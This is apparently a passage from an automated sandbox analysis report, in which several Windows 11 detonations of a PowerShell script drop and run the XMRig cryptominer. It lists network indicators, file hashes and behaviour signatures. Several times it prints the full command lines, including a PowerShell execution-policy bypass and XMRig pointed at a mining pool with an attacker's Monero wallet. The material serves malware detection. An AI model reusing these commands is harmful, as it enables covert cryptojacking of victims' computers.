powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.110.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.110.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| NL | 23.62.61.155:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 155.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 29.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
Files
memory/3456-0-0x00007FFA85653000-0x00007FFA85655000-memory.dmp
memory/3456-1-0x0000022DDDD90000-0x0000022DDDDB2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4cmanr0u.3zv.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3456-11-0x00007FFA85650000-0x00007FFA86111000-memory.dmp
memory/3456-12-0x00007FFA85650000-0x00007FFA86111000-memory.dmp
memory/3456-14-0x00007FFA85650000-0x00007FFA86111000-memory.dmp
memory/3456-15-0x0000022DF6FF0000-0x0000022DF7002000-memory.dmp
memory/3456-16-0x0000022DF6FD0000-0x0000022DF6FDA000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/4380-47-0x0000019724080000-0x00000197240A0000-memory.dmp
memory/4380-48-0x00000197B6640000-0x00000197B6660000-memory.dmp
memory/4380-49-0x00007FF716900000-0x00007FF717533000-memory.dmp
memory/3456-51-0x00007FFA85650000-0x00007FFA86111000-memory.dmp
memory/3456-50-0x00007FFA85653000-0x00007FFA85655000-memory.dmp
memory/4380-54-0x00000197B6CB0000-0x00000197B6CD0000-memory.dmp
memory/4380-53-0x00000197B6C90000-0x00000197B6CB0000-memory.dmp
memory/4380-52-0x00007FF716900000-0x00007FF717533000-memory.dmp
memory/4380-55-0x00007FF716900000-0x00007FF717533000-memory.dmp
memory/3456-56-0x00007FFA85650000-0x00007FFA86111000-memory.dmp
memory/4380-57-0x00007FF716900000-0x00007FF717533000-memory.dmp
memory/4380-59-0x00000197B6CB0000-0x00000197B6CD0000-memory.dmp
memory/4380-58-0x00000197B6C90000-0x00000197B6CB0000-memory.dmp
memory/4380-60-0x00007FF716900000-0x00007FF717533000-memory.dmp
memory/4380-61-0x00007FF716900000-0x00007FF717533000-memory.dmp
memory/4380-62-0x00007FF716900000-0x00007FF717533000-memory.dmp
memory/4380-63-0x00007FF716900000-0x00007FF717533000-memory.dmp
memory/4380-64-0x00007FF716900000-0x00007FF717533000-memory.dmp
memory/4380-65-0x00007FF716900000-0x00007FF717533000-memory.dmp
memory/4380-66-0x00007FF716900000-0x00007FF717533000-memory.dmp
memory/4380-67-0x00007FF716900000-0x00007FF717533000-memory.dmp
memory/4380-68-0x00007FF716900000-0x00007FF717533000-memory.dmp
memory/4380-69-0x00007FF716900000-0x00007FF717533000-memory.dmp
memory/4380-70-0x00007FF716900000-0x00007FF717533000-memory.dmp
memory/4380-71-0x00007FF716900000-0x00007FF717533000-memory.dmp
memory/4380-72-0x00007FF716900000-0x00007FF717533000-memory.dmp
memory/4380-73-0x00007FF716900000-0x00007FF717533000-memory.dmp
memory/4380-74-0x00007FF716900000-0x00007FF717533000-memory.dmp
memory/4380-75-0x00007FF716900000-0x00007FF717533000-memory.dmp
memory/4380-76-0x00007FF716900000-0x00007FF717533000-memory.dmp
memory/4380-77-0x00007FF716900000-0x00007FF717533000-memory.dmp
memory/4380-78-0x00007FF716900000-0x00007FF717533000-memory.dmp
memory/4380-79-0x00007FF716900000-0x00007FF717533000-memory.dmp
memory/4380-80-0x00007FF716900000-0x00007FF717533000-memory.dmp
memory/4380-81-0x00007FF716900000-0x00007FF717533000-memory.dmp
memory/4380-82-0x00007FF716900000-0x00007FF717533000-memory.dmp
memory/4380-83-0x00007FF716900000-0x00007FF717533000-memory.dmp
Analysis: behavioral13
Detonation Overview
Submitted
2024-05-22 20:12
Reported
2024-05-22 20:18
Platform
win11-20240426-en
Max time kernel
290s
Max time network
296s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2316 wrote to memory of 4836 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 2316 wrote to memory of 4836 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 185.199.110.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.110.199.185.in-addr.arpa | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 48.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 27.173.189.20.in-addr.arpa | udp |
Files
memory/2316-0-0x00007FFA858C3000-0x00007FFA858C5000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_y4ysklin.wqs.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/2316-9-0x000002D47B850000-0x000002D47B872000-memory.dmp
memory/2316-10-0x00007FFA858C0000-0x00007FFA86382000-memory.dmp
memory/2316-11-0x00007FFA858C0000-0x00007FFA86382000-memory.dmp
memory/2316-12-0x00007FFA858C0000-0x00007FFA86382000-memory.dmp
memory/2316-13-0x00007FFA858C0000-0x00007FFA86382000-memory.dmp
memory/2316-14-0x00007FFA858C0000-0x00007FFA86382000-memory.dmp
memory/2316-15-0x00007FFA858C0000-0x00007FFA86382000-memory.dmp
memory/2316-18-0x000002D47B830000-0x000002D47B83A000-memory.dmp
memory/2316-17-0x000002D47B9D0000-0x000002D47B9E2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/4836-49-0x000002DB6C840000-0x000002DB6C860000-memory.dmp
memory/4836-50-0x000002DB6E310000-0x000002DB6E330000-memory.dmp
memory/4836-51-0x00007FF67DD80000-0x00007FF67E9B3000-memory.dmp
memory/4836-53-0x000002DB6E350000-0x000002DB6E370000-memory.dmp
memory/4836-52-0x000002DB6E330000-0x000002DB6E350000-memory.dmp
memory/4836-54-0x00007FF67DD80000-0x00007FF67E9B3000-memory.dmp
memory/4836-55-0x00007FF67DD80000-0x00007FF67E9B3000-memory.dmp
memory/4836-57-0x000002DB6E330000-0x000002DB6E350000-memory.dmp
memory/4836-56-0x00007FF67DD80000-0x00007FF67E9B3000-memory.dmp
memory/4836-58-0x000002DB6E350000-0x000002DB6E370000-memory.dmp
memory/4836-59-0x00007FF67DD80000-0x00007FF67E9B3000-memory.dmp
memory/4836-60-0x00007FF67DD80000-0x00007FF67E9B3000-memory.dmp
memory/4836-61-0x00007FF67DD80000-0x00007FF67E9B3000-memory.dmp
memory/4836-62-0x00007FF67DD80000-0x00007FF67E9B3000-memory.dmp
memory/4836-63-0x00007FF67DD80000-0x00007FF67E9B3000-memory.dmp
memory/4836-64-0x00007FF67DD80000-0x00007FF67E9B3000-memory.dmp
memory/4836-65-0x00007FF67DD80000-0x00007FF67E9B3000-memory.dmp
memory/4836-66-0x00007FF67DD80000-0x00007FF67E9B3000-memory.dmp
memory/4836-67-0x00007FF67DD80000-0x00007FF67E9B3000-memory.dmp
memory/4836-68-0x00007FF67DD80000-0x00007FF67E9B3000-memory.dmp
memory/4836-69-0x00007FF67DD80000-0x00007FF67E9B3000-memory.dmp
memory/4836-70-0x00007FF67DD80000-0x00007FF67E9B3000-memory.dmp
memory/4836-71-0x00007FF67DD80000-0x00007FF67E9B3000-memory.dmp
memory/4836-72-0x00007FF67DD80000-0x00007FF67E9B3000-memory.dmp
memory/4836-73-0x00007FF67DD80000-0x00007FF67E9B3000-memory.dmp
memory/4836-74-0x00007FF67DD80000-0x00007FF67E9B3000-memory.dmp
memory/4836-75-0x00007FF67DD80000-0x00007FF67E9B3000-memory.dmp
memory/4836-76-0x00007FF67DD80000-0x00007FF67E9B3000-memory.dmp
memory/4836-77-0x00007FF67DD80000-0x00007FF67E9B3000-memory.dmp
memory/4836-78-0x00007FF67DD80000-0x00007FF67E9B3000-memory.dmp
memory/4836-79-0x00007FF67DD80000-0x00007FF67E9B3000-memory.dmp
memory/4836-80-0x00007FF67DD80000-0x00007FF67E9B3000-memory.dmp
Analysis: behavioral20
Detonation Overview
Submitted
2024-05-22 20:12
Reported
2024-05-22 20:18
Platform
win11-20240508-en
Max time kernel
293s
Max time network
291s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4864 wrote to memory of 1804 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 4864 wrote to memory of 1804 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 185.199.110.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.110.199.185.in-addr.arpa | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 52.111.227.14:443 | tcp |
Files
memory/4864-0-0x00007FFE0ABB3000-0x00007FFE0ABB5000-memory.dmp
memory/4864-10-0x00007FFE0ABB0000-0x00007FFE0B672000-memory.dmp
memory/4864-9-0x00000261BCAA0000-0x00000261BCAC2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_lt4iqyml.soa.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4864-11-0x00007FFE0ABB0000-0x00007FFE0B672000-memory.dmp
memory/4864-12-0x00007FFE0ABB0000-0x00007FFE0B672000-memory.dmp
memory/4864-14-0x00000261BCD50000-0x00000261BCD62000-memory.dmp
memory/4864-15-0x00000261BCD40000-0x00000261BCD4A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/1804-46-0x0000017A20DD0000-0x0000017A20DF0000-memory.dmp
memory/1804-47-0x0000017AB4C60000-0x0000017AB4C80000-memory.dmp
memory/4864-48-0x00007FFE0ABB0000-0x00007FFE0B672000-memory.dmp
memory/4864-50-0x00007FFE0ABB3000-0x00007FFE0ABB5000-memory.dmp
memory/1804-49-0x00007FF661820000-0x00007FF662453000-memory.dmp
memory/4864-51-0x00007FFE0ABB0000-0x00007FFE0B672000-memory.dmp
memory/1804-55-0x0000017AB52E0000-0x0000017AB5300000-memory.dmp
memory/1804-54-0x0000017AB50B0000-0x0000017AB50D0000-memory.dmp
memory/1804-52-0x00007FF661820000-0x00007FF662453000-memory.dmp
memory/4864-53-0x00007FFE0ABB0000-0x00007FFE0B672000-memory.dmp
memory/1804-56-0x00007FF661820000-0x00007FF662453000-memory.dmp
memory/1804-59-0x0000017AB52E0000-0x0000017AB5300000-memory.dmp
memory/1804-58-0x0000017AB50B0000-0x0000017AB50D0000-memory.dmp
memory/1804-57-0x00007FF661820000-0x00007FF662453000-memory.dmp
memory/1804-60-0x00007FF661820000-0x00007FF662453000-memory.dmp
memory/1804-61-0x00007FF661820000-0x00007FF662453000-memory.dmp
memory/1804-62-0x00007FF661820000-0x00007FF662453000-memory.dmp
memory/1804-63-0x00007FF661820000-0x00007FF662453000-memory.dmp
memory/1804-64-0x00007FF661820000-0x00007FF662453000-memory.dmp
memory/1804-65-0x00007FF661820000-0x00007FF662453000-memory.dmp
memory/1804-66-0x00007FF661820000-0x00007FF662453000-memory.dmp
memory/1804-67-0x00007FF661820000-0x00007FF662453000-memory.dmp
memory/1804-68-0x00007FF661820000-0x00007FF662453000-memory.dmp
memory/1804-69-0x00007FF661820000-0x00007FF662453000-memory.dmp
memory/1804-70-0x00007FF661820000-0x00007FF662453000-memory.dmp
memory/1804-71-0x00007FF661820000-0x00007FF662453000-memory.dmp
memory/1804-72-0x00007FF661820000-0x00007FF662453000-memory.dmp
memory/1804-73-0x00007FF661820000-0x00007FF662453000-memory.dmp
memory/1804-74-0x00007FF661820000-0x00007FF662453000-memory.dmp
memory/1804-75-0x00007FF661820000-0x00007FF662453000-memory.dmp
memory/1804-76-0x00007FF661820000-0x00007FF662453000-memory.dmp
memory/1804-77-0x00007FF661820000-0x00007FF662453000-memory.dmp
memory/1804-78-0x00007FF661820000-0x00007FF662453000-memory.dmp
memory/1804-79-0x00007FF661820000-0x00007FF662453000-memory.dmp
memory/1804-80-0x00007FF661820000-0x00007FF662453000-memory.dmp
memory/1804-81-0x00007FF661820000-0x00007FF662453000-memory.dmp
memory/1804-82-0x00007FF661820000-0x00007FF662453000-memory.dmp
memory/1804-83-0x00007FF661820000-0x00007FF662453000-memory.dmp
Analysis: behavioral28
Detonation Overview
Submitted
2024-05-22 20:12
Reported
2024-05-22 20:18
Platform
win11-20240419-en
Max time kernel
297s
Max time network
295s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3000 wrote to memory of 468 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 3000 wrote to memory of 468 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 185.199.110.133:443 | objects.githubusercontent.com | tcp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
Files
memory/3000-0-0x00007FFFFB493000-0x00007FFFFB495000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ottjnsdz.0mh.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3000-9-0x00000154AC3B0000-0x00000154AC3D2000-memory.dmp
memory/3000-10-0x00007FFFFB490000-0x00007FFFFBF52000-memory.dmp
memory/3000-11-0x00007FFFFB490000-0x00007FFFFBF52000-memory.dmp
memory/3000-12-0x00007FFFFB490000-0x00007FFFFBF52000-memory.dmp
memory/3000-13-0x00007FFFFB493000-0x00007FFFFB495000-memory.dmp
memory/3000-14-0x00007FFFFB490000-0x00007FFFFBF52000-memory.dmp
memory/3000-15-0x00007FFFFB490000-0x00007FFFFBF52000-memory.dmp
memory/3000-16-0x00007FFFFB490000-0x00007FFFFBF52000-memory.dmp
memory/3000-19-0x00000154C4BE0000-0x00000154C4BEA000-memory.dmp
memory/3000-18-0x00000154C4BF0000-0x00000154C4C02000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/468-50-0x0000025CC57B0000-0x0000025CC57D0000-memory.dmp
memory/468-51-0x0000025CC6F20000-0x0000025CC6F40000-memory.dmp
memory/468-52-0x00007FF6F6660000-0x00007FF6F7293000-memory.dmp
memory/468-53-0x00007FF6F6660000-0x00007FF6F7293000-memory.dmp
